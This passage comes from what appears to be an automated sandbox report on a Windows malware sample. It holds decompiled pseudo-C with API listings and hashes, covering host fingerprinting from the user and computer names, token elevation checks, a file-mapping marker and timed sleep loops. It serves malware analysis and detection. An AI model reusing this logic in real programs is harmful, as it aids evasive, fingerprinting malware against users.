                                                          									if(_t116 != 0) {
                                                          										goto L32;
                                                          									}
                                                          								}
                                                          								goto L27;
                                                          							}
                                                          						}
                                                          					}
                                                          					_t98 =  *0x495d1a0; // 0x0
                                                          					if(_t98 == 0) {
                                                          						L9:
                                                          						_t99 = LoadLibraryA(_v60); // executed
                                                          						_t138 = _t99;
                                                          						if(_t138 != 0) {
                                                          							L13:
                                                          							if(InterlockedExchange(_v28, _t138) == _t138) {
                                                          								FreeLibrary(_t138);
                                                          							} else {
                                                          								if(_t139[6] != 0) {
                                                          									_t102 = LocalAlloc(0x40, 8);
                                                          									if(_t102 != 0) {
                                                          										 *(_t102 + 4) = _t139;
                                                          										_t125 =  *0x495d198; // 0x0
                                                          										 *_t102 = _t125;
                                                          										 *0x495d198 = _t102;
                                                          									}
                                                          								}
                                                          							}
                                                          							goto L18;
                                                          						}
                                                          						_v40 = GetLastError();
                                                          						_t104 =  *0x495d19c; // 0x0
                                                          						if(_t104 == 0) {
                                                          							L12:
                                                          							_a8 =  &_v72;
                                                          							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                                          							return _v44;
                                                          						}
                                                          						_t138 =  *_t104(3,  &_v72);
                                                          						if(_t138 != 0) {
                                                          							goto L13;
                                                          						}
                                                          						goto L12;
                                                          					}
                                                          					_t138 =  *_t98(1,  &_v72);
                                                          					if(_t138 != 0) {
                                                          						goto L13;
                                                          					}
                                                          					goto L9;
                                                          				}
                                                          				_t116 =  *_t82(0,  &_v72);
                                                          				if(_t116 != 0) {
                                                          					goto L33;
                                                          				}
                                                          				goto L6;
                                                          			}


                                                          APIs
                                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0495ACCE
                                                          • LoadLibraryA.KERNELBASE(?), ref: 0495AD4B
                                                          • GetLastError.KERNEL32 ref: 0495AD57
                                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0495AD8A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                          • String ID: $
                                                          • API String ID: 948315288-3993045852
                                                          • Opcode ID: d15b01c39739daf49c71e8596838b5c012ec2168e7b92fd1be2ab28d1685d1c3
                                                          • Instruction ID: 080aa8efebdcd3a608e8c34dadc99671c529b4a849225901ef3df89eba252958
                                                          • Opcode Fuzzy Hash: d15b01c39739daf49c71e8596838b5c012ec2168e7b92fd1be2ab28d1685d1c3
                                                          • Instruction Fuzzy Hash: 50812B71A00305AFDB14DFA8D884AAEBBF9EF48311F248239E905E7250E7B4E945CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 83%
                                                          			E049551B0(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                          				struct %anon52 _v8;
                                                          				long _v12;
                                                          				char _v16;
                                                          				char _v20;
                                                          				signed int _v24;
                                                          				intOrPtr _v32;
                                                          				union _LARGE_INTEGER _v36;
                                                          				intOrPtr _v40;
                                                          				void* _v44;
                                                          				void _v88;
                                                          				char _v92;
                                                          				struct %anon52 _t46;
                                                          				intOrPtr _t51;
                                                          				long _t53;
                                                          				void* _t54;
                                                          				struct %anon52 _t60;
                                                          				long _t64;
                                                          				signed int _t65;
                                                          				void* _t68;
                                                          				void* _t70;
                                                          				signed int _t71;
                                                          				intOrPtr _t73;
                                                          				intOrPtr _t76;
                                                          				void** _t78;
                                                          				void* _t80;
                                                          
                                                          				_t73 = __edx;
                                                          				_v92 = 0;
                                                          				memset( &_v88, 0, 0x2c);
                                                          				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                          				_v44 = _t46;
                                                          				if(_t46 == 0) {
                                                          					_v8.LowPart = GetLastError();
                                                          				} else {
                                                          					_push(0xffffffff);
                                                          					_push(0xff676980);
                                                          					_push(0);
                                                          					_push( *0x495d240);
                                                          					_v20 = 0;
                                                          					_v16 = 0;
                                                          					L0495AF2E();
                                                          					_v36.LowPart = _t46;
                                                          					_v32 = _t73;
                                                          					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                          					_t51 =  *0x495d26c; // 0x2b4
                                                          					_v40 = _t51;
                                                          					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                          					_v8.LowPart = _t53;
                                                          					if(_t53 == 0) {
                                                          						if(_a8 != 0) {
                                                          							L4:
                                                          							 *0x495d24c = 5;
                                                          						} else {
                                                          							_t68 = E04958D14(_t73); // executed
                                                          							if(_t68 != 0) {
                                                          								goto L4;
                                                          							}
                                                          						}
                                                          						_v12 = 0;
                                                          						L6:
                                                          						L6:
                                                          						if(_v12 == 1 && ( *0x495d260 & 0x00000001) == 0) {
                                                          							_v12 = 2;
                                                          						}
                                                          						_t71 = _v12;
                                                          						_t58 = _t71 << 4;
                                                          						_t76 = _t80 + (_t71 << 4) - 0x54;
                                                          						_t72 = _t71 + 1;
                                                          						_v24 = _t71 + 1;
                                                          						_t60 = E0495A376(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
                                                          						_v8.LowPart = _t60;
                                                          						if(_t60 != 0) {
                                                          							goto L17;
                                                          						}
                                                          						_t65 = _v24;
                                                          						_v12 = _t65;
                                                          						_t90 = _t65 - 3;
                                                          						if(_t65 != 3) {
                                                          							goto L6;
                                                          						} else {
                                                          							_v8.LowPart = E049536B1(_t72, _t90,  &_v92, _a4, _a8);
                                                          						}
                                                          						goto L12;
                                                          						L17:
                                                          						__eflags = _t60 - 0x10d2;
                                                          						if(_t60 != 0x10d2) {
                                                          							_push(0xffffffff);
                                                          							_push(0xff676980);
                                                          							_push(0);
                                                          							_push( *0x495d244);
                                                          							goto L21;
                                                          						} else {
                                                          							__eflags =  *0x495d248; // 0x0
                                                          							if(__eflags == 0) {
                                                          								goto L12;
                                                          							} else {
                                                          								_t60 = E04956761();
                                                          								_push(0xffffffff);
                                                          								_push(0xdc3cba00);
                                                          								_push(0);
                                                          								_push( *0x495d248);
                                                          								L21:
                                                          								L0495AF2E();
                                                          								_v36.LowPart = _t60;
                                                          								_v32 = _t76;
                                                          								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                                                          								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                          								_v8.LowPart = _t64;
                                                          								__eflags = _t64;
                                                          								if(_t64 == 0) {
                                                          									goto L6;
                                                          								} else {
                                                          									goto L12;
                                                          								}
                                                          							}
                                                          						}
                                                          						L25:
                                                          					}
                                                          					L12:
                                                          					_t78 =  &_v92;
                                                          					_t70 = 3;
                                                          					do {
                                                          						_t54 =  *_t78;
                                                          						if(_t54 != 0) {
                                                          							HeapFree( *0x495d238, 0, _t54);
                                                          						}
                                                          						_t78 =  &(_t78[4]);
                                                          						_t70 = _t70 - 1;
                                                          					} while (_t70 != 0);
                                                          					CloseHandle(_v44);
                                                          				}
                                                          				return _v8;
                                                          				goto L25;
                                                          			}





























                                                          APIs
                                                          • memset.NTDLL ref: 049551C5
                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 049551D1
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 049551F6
                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 04955212
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0495522B
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 049552C1
                                                          • CloseHandle.KERNEL32(?), ref: 049552D0
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 0495530A
                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,04955D5E,?), ref: 04955320
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0495532B
                                                            • Part of subcall function 04958D14: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04DD9368,00000000,?,74B5F710,00000000,74B5F730), ref: 04958D63
                                                            • Part of subcall function 04958D14: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04DD93A0,?,00000000,30314549,00000014,004F0053,04DD935C), ref: 04958E00
                                                            • Part of subcall function 04958D14: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,0495523E), ref: 04958E12
                                                          • GetLastError.KERNEL32 ref: 0495533D
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                          • String ID:
                                                          • API String ID: 3521023985-0
                                                          • Opcode ID: d1920438d8f7b73d3cb15b577f6a6940ee44fb3c5721a53d5458f9cf0d3081a3
                                                          • Instruction ID: 5625325a934624ef33ce8c49c563fe2d76feb8870e60f181be2b5dc86891e2ef
                                                          • Opcode Fuzzy Hash: d1920438d8f7b73d3cb15b577f6a6940ee44fb3c5721a53d5458f9cf0d3081a3
                                                          • Instruction Fuzzy Hash: 74513A71805228BBDF11EF95EC449EEBFBDEF49720F304625E815A2169D774AA40CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E0495232F(intOrPtr __edx, void** _a4, void** _a8) {
                                                          				intOrPtr _v8;
                                                          				struct _FILETIME* _v12;
                                                          				short _v56;
                                                          				struct _FILETIME* _t12;
                                                          				intOrPtr _t13;
                                                          				void* _t17;
                                                          				void* _t21;
                                                          				intOrPtr _t27;
                                                          				long _t28;
                                                          				void* _t30;
                                                          
                                                          				_t27 = __edx;
                                                          				_t12 =  &_v12;
                                                          				GetSystemTimeAsFileTime(_t12);
                                                          				_push(0x192);
                                                          				_push(0x54d38000);
                                                          				_push(_v8);
                                                          				_push(_v12);
                                                          				L0495AF28();
                                                          				_push(_t12);
                                                          				_v12 = _t12;
                                                          				_t13 =  *0x495d2a8; // 0x47a5a8
                                                          				_t5 = _t13 + 0x495e87e; // 0x4dd8e26
                                                          				_t6 = _t13 + 0x495e59c; // 0x530025
                                                          				_push(0x16);
                                                          				_push( &_v56);
                                                          				_v8 = _t27;
                                                          				L0495ABCA();
                                                          				_t17 = CreateFileMappingW(0xffffffff, 0x495d2ac, 4, 0, 0x1000,  &_v56); // executed
                                                          				_t30 = _t17;
                                                          				if(_t30 == 0) {
                                                          					_t28 = GetLastError();
                                                          				} else {
                                                          					if(GetLastError() == 0xb7) {
                                                          						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                          						if(_t21 == 0) {
                                                          							_t28 = GetLastError();
                                                          							if(_t28 != 0) {
                                                          								goto L6;
                                                          							}
                                                          						} else {
                                                          							 *_a4 = _t30;
                                                          							 *_a8 = _t21;
                                                          							_t28 = 0;
                                                          						}
                                                          					} else {
                                                          						_t28 = 2;
                                                          						L6:
                                                          						CloseHandle(_t30);
                                                          					}
                                                          				}
                                                          				return _t28;
                                                          			}














                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,04955C31,?,?,4D283A53,?,?), ref: 0495233B
                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04952351
                                                          • _snwprintf.NTDLL ref: 04952376
                                                          • CreateFileMappingW.KERNELBASE(000000FF,0495D2AC,00000004,00000000,00001000,?), ref: 04952392
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04955C31,?,?,4D283A53), ref: 049523A4
                                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 049523BB
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04955C31,?,?), ref: 049523DC
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04955C31,?,?,4D283A53), ref: 049523E4
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                          • String ID:
                                                          • API String ID: 1814172918-0
                                                          • Opcode ID: b079927a57814241d7bcac0f965d52e684c24e4da49740db5e693de673697b83
                                                          • Instruction ID: 96f6ab870377e47cac669db58b88dbf70e9d5e6dfb73eedf58f385fb5f695a2e
                                                          • Opcode Fuzzy Hash: b079927a57814241d7bcac0f965d52e684c24e4da49740db5e693de673697b83
                                                          • Instruction Fuzzy Hash: 2B21C072644304BBDB11EF64DC45F8E3BAEEB88B40F344171FA05EB1A0E6B0A904CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 96%
                                                          			E04959135(char __eax, void* __esi) {
                                                          				long _v8;
                                                          				char _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				signed int _v28;
                                                          				long _t34;
                                                          				signed int _t39;
                                                          				long _t50;
                                                          				char _t59;
                                                          				intOrPtr _t61;
                                                          				void* _t62;
                                                          				void* _t64;
                                                          				char _t65;
                                                          				intOrPtr* _t67;
                                                          				void* _t68;
                                                          				void* _t69;
                                                          
                                                          				_t69 = __esi;
                                                          				_t65 = __eax;
                                                          				_v8 = 0;
                                                          				_v12 = __eax;
                                                          				if(__eax == 0) {
                                                          					_t59 =  *0x495d270; // 0xd448b889
                                                          					_v12 = _t59;
                                                          				}
                                                          				_t64 = _t69;
                                                          				E0495A6CC( &_v12, _t64);
                                                          				if(_t65 != 0) {
                                                          					 *_t69 =  *_t69 ^  *0x495d2a4 ^ 0x4c0ca0ae;
                                                          				} else {
                                                          					GetUserNameW(0,  &_v8); // executed
                                                          					_t50 = _v8;
                                                          					if(_t50 != 0) {
                                                          						_t62 = RtlAllocateHeap( *0x495d238, 0, _t50 + _t50);
                                                          						if(_t62 != 0) {
                                                          							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                          								_t64 = _t62;
                                                          								 *_t69 =  *_t69 ^ E04957306(_v8 + _v8, _t64);
                                                          							}
                                                          							HeapFree( *0x495d238, 0, _t62);
                                                          						}
                                                          					}
                                                          				}
                                                          				_t61 = __imp__;
                                                          				_v8 = _v8 & 0x00000000;
                                                          				GetComputerNameW(0,  &_v8);
                                                          				_t34 = _v8;
                                                          				if(_t34 != 0) {
                                                          					_t68 = RtlAllocateHeap( *0x495d238, 0, _t34 + _t34);
                                                          					if(_t68 != 0) {
                                                          						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                          							_t64 = _t68;
                                                          							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04957306(_v8 + _v8, _t64);
                                                          						}
                                                          						HeapFree( *0x495d238, 0, _t68);
                                                          					}
                                                          				}
                                                          				asm("cpuid");
                                                          				_t67 =  &_v28;
                                                          				 *_t67 = 1;
                                                          				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                          				 *((intOrPtr*)(_t67 + 8)) = 0;
                                                          				 *(_t67 + 0xc) = _t64;
                                                          				_t39 = _v16 ^ _v20 ^ _v28;
                                                          				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                                          				return _t39;
                                                          			}




















                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0495916C
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04959183
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04959190
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04955D20), ref: 049591B1
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 049591D8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 049591EC
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 049591F9
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04955D20), ref: 04959217
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                          • String ID:
                                                          • API String ID: 3239747167-0
                                                          • Opcode ID: aa14d587b5793b2552fe6dbb83d4b8933e7abdc44c86466c592b17cf99a1b17a
                                                          • Instruction ID: 39054f7a5d3a44e84d09a1bd0d0705f29d8fa58c7b06ec92bc6250b425ec1d6c
                                                          • Opcode Fuzzy Hash: aa14d587b5793b2552fe6dbb83d4b8933e7abdc44c86466c592b17cf99a1b17a
                                                          • Instruction Fuzzy Hash: EE3109B1A04205EFEB10DFA9ED84A6EBBFDEF44214F218579E905D7220DB34EE019B10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
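                                                          			E04951A08(long* _a4) {
                                                          				long _v8;
                                                          				void* _v12;
                                                          				void _v16;
                                                          				long _v20;
                                                          				int _t33;
                                                          				void* _t46;
                                                          
                                                          				// Defaults: return value 1, integrity RID 0x2000 (SECURITY_MANDATORY_MEDIUM_RID).
                                                          				_v16 = 1;
                                                          				_v20 = 0x2000;
                                                          				if( *0x495d25c > 5) {
                                                          					_v16 = 0;
                                                          					// 0xffffffff is the current-process pseudo-handle; 0x20008 = TOKEN_READ.
                                                          					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                          						// 0x14 = TokenElevation: _v16 receives the 4-byte TOKEN_ELEVATION flag.
                                                          						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                          						_v8 = 0;
                                                          						// 0x19 = TokenIntegrityLevel: this first call only obtains the required buffer size.
                                                          						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                          						if(_v8 != 0) {
                                                          							_t46 = E0495A71F(_v8);
                                                          							if(_t46 != 0) {
                                                          								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                          								if(_t33 != 0) {
                                                          									// The last sub-authority of the label SID is the integrity level RID.
                                                          									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                          								}
                                                          								E0495A734(_t46);
                                                          							}
                                                          						}
                                                          						CloseHandle(_v12);
                                                          					}
                                                          				}
                                                          				// Integrity RID goes out through _a4; the elevation flag is the return value.
                                                          				 *_a4 = _v20;
                                                          				return _v16;
                                                          			}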










                                                          APIs
                                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04951A3A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenElevation),00000001,00000004,?,00000000), ref: 04951A5A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04951A6A
                                                          • CloseHandle.KERNEL32(00000000), ref: 04951ABA
                                                            • Part of subcall function 0495A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04955595), ref: 0495A72B
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04951A8D
                                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04951A95
                                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04951AA5
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                          • String ID:
                                                          • API String ID: 1295030180-0
                                                          • Opcode ID: 9184a917385717594650fd69e942b75e344fa0ba234f5909988e50385e68d4c9
                                                          • Instruction ID: c2ce83ea9e65c250bc8f34dd194fb0b545c425d6bcc4f7687f8a0f1f566802ff
                                                          • Opcode Fuzzy Hash: 9184a917385717594650fd69e942b75e344fa0ba234f5909988e50385e68d4c9
                                                          • Instruction Fuzzy Hash: 06211975900249FFEB01DFA4DC84EAEBBBDEB44304F204266E910A6160D7759A45DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(?), ref: 0495395A
                                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 049539DD
                                                          • StrStrIW.SHLWAPI(00000000,006E0069), ref: 04953A1D
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04953A3F
                                                            • Part of subcall function 04956F3A: SysAllocString.OLEAUT32(0495C290), ref: 04956F8A
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 04953A92
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04953AA1
                                                            • Part of subcall function 04951AE2: Sleep.KERNELBASE(000001F4), ref: 04951B2A
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                          • String ID:
                                                          • API String ID: 2118684380-0
                                                          • Opcode ID: e603d9d6e32c6b6888f5eb8244fa04e71ce3de07697aadb233a8985e84b52551
                                                          • Instruction ID: ba644b042d48fce19c1c97d22393387efe0f3ba4ae4675d7f3b5c4d0dbd1aeb5
                                                          • Opcode Fuzzy Hash: e603d9d6e32c6b6888f5eb8244fa04e71ce3de07697aadb233a8985e84b52551
                                                          • Instruction Fuzzy Hash: AA513C76500609AFDB11DFA8C844A9AB7BAFFC8744F248539ED05EB220EB75ED05CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E049512E5(void* __ecx, void* __edx, intOrPtr _a4) {
                                                          				struct _FILETIME _v12;
                                                          				void* _t10;
                                                          				void* _t12;
                                                          				int _t14;
                                                          				signed int _t16;
                                                          				void* _t18;
                                                          				signed int _t19;
                                                          				unsigned int _t23;
                                                          				void* _t26;
                                                          				signed int _t33;
                                                          
                                                          				_t26 = __edx;
                                                          				_push(__ecx);
                                                          				_push(__ecx);
                                                          				_t10 = HeapCreate(0, 0x400000, 0); // executed
                                                          				 *0x495d238 = _t10;
                                                          				if(_t10 != 0) {
                                                          					 *0x495d1a8 = GetTickCount();
                                                          					_t12 = E04953E69(_a4);
                                                          					if(_t12 == 0) {
                                                          						do {
                                                          							GetSystemTimeAsFileTime( &_v12);
                                                          							_t14 = SwitchToThread();
                                                          							_t23 = _v12.dwHighDateTime;
                                                          							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                                                          							_push(0);
                                                          							_push(9);
                                                          							_push(_t23 >> 7);
                                                          							_push(_t16);
                                                          							L0495B08A();
                                                          							_t33 = _t14 + _t16;
                                                          							_t18 = E04955548(_a4, _t33);
                                                          							_t19 = 2;
                                                          							_t25 = _t33;
                                                          							Sleep(_t19 << _t33); // executed
                                                          						} while (_t18 == 1);
                                                          						if(E04954DA2(_t25) != 0) {
                                                          							 *0x495d260 = 1; // executed
                                                          						}
                                                          						_t12 = E04955BA2(_t26); // executed
                                                          					}
                                                          				} else {
                                                          					_t12 = 8;
                                                          				}
                                                          				return _t12;
                                                          			}














                                                          APIs
                                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04954EF2,?), ref: 049512F8
                                                          • GetTickCount.KERNEL32 ref: 0495130C
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,04954EF2,?), ref: 04951328
                                                          • SwitchToThread.KERNEL32(?,00000001,?,?,?,04954EF2,?), ref: 0495132E
                                                          • _aullrem.NTDLL(?,?,00000009,00000000), ref: 0495134B
                                                          • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,04954EF2,?), ref: 04951365
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                          • String ID:
                                                          • API String ID: 507476733-0
                                                          • Opcode ID: 17b81040bca7075d17abb97e16e3d2a481bc715e3aab9efaf1b409ca9ff8d2f5
                                                          • Instruction ID: 8f335aadecc51205f94c45963eace5c2f59e5b73e18aa50bf9381040870995ec
                                                          • Opcode Fuzzy Hash: 17b81040bca7075d17abb97e16e3d2a481bc715e3aab9efaf1b409ca9ff8d2f5
                                                          • Instruction Fuzzy Hash: 14117072A48301BBEB10EB74EC1AB5A7A9CDB84264F204635FD45D62A0EA74E8408761
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 57%
                                                          			E04955BA2(signed int __edx) {
                                                          				signed int _v8;
                                                          				long _v12;
                                                          				CHAR* _v16;
                                                          				long _v20;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* _t21;
                                                          				CHAR* _t22;
                                                          				CHAR* _t25;
                                                          				intOrPtr _t26;
                                                          				void* _t27;
                                                          				void* _t31;
                                                          				void* _t32;
                                                          				CHAR* _t36;
                                                          				CHAR* _t43;
                                                          				CHAR* _t44;
                                                          				void* _t49;
                                                          				void* _t51;
                                                          				CHAR* _t54;
                                                          				signed char _t56;
                                                          				intOrPtr _t58;
                                                          				signed int _t59;
                                                          				void* _t62;
                                                          				CHAR* _t65;
                                                          				CHAR* _t66;
                                                          				char* _t67;
                                                          				void* _t68;
                                                          
                                                          				_t61 = __edx;
                                                          				_v20 = 0;
                                                          				_v8 = 0;
                                                          				_v12 = 0;
                                                          				_t21 = E04956C09();
                                                          				if(_t21 != 0) {
                                                          					_t59 =  *0x495d25c; // 0x4000000a
                                                          					_t55 = (_t59 & 0xf0000000) + _t21;
                                                          					 *0x495d25c = (_t59 & 0xf0000000) + _t21;
                                                          				}
                                                          				_t22 =  *0x495d160(0, 2);
                                                          				_v16 = _t22;
                                                          				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                          					_t25 = E0495496B( &_v8,  &_v20); // executed
                                                          					_t54 = _t25;
                                                          					_t26 =  *0x495d2a8; // 0x47a5a8
                                                          					if( *0x495d25c > 5) {
                                                          						_t8 = _t26 + 0x495e5cd; // 0x4d283a53
                                                          						_t27 = _t8;
                                                          					} else {
                                                          						_t7 = _t26 + 0x495e9f5; // 0x44283a44
                                                          						_t27 = _t7;
                                                          					}
                                                          					E0495729A(_t27, _t27);
                                                          					_t31 = E0495232F(_t61,  &_v20,  &_v12); // executed
                                                          					if(_t31 == 0) {
                                                          						CloseHandle(_v20);
                                                          					}
                                                          					_t62 = 5;
                                                          					if(_t54 != _t62) {
                                                          						 *0x495d270 =  *0x495d270 ^ 0x81bbe65d;
                                                          						_t32 = E0495A71F(0x60);
                                                          						 *0x495d32c = _t32;
                                                          						__eflags = _t32;
                                                          						if(_t32 == 0) {
                                                          							_push(8);
                                                          							_pop(0);
                                                          						} else {
                                                          							memset(_t32, 0, 0x60);
                                                          							_t49 =  *0x495d32c; // 0x4dd95b0
                                                          							_t68 = _t68 + 0xc;
                                                          							__imp__(_t49 + 0x40);
                                                          							_t51 =  *0x495d32c; // 0x4dd95b0
                                                          							 *_t51 = 0x495e81a;
                                                          						}
                                                          						_t54 = 0;
                                                          						__eflags = 0;
                                                          						if(0 == 0) {
                                                          							_t36 = RtlAllocateHeap( *0x495d238, 0, 0x43);
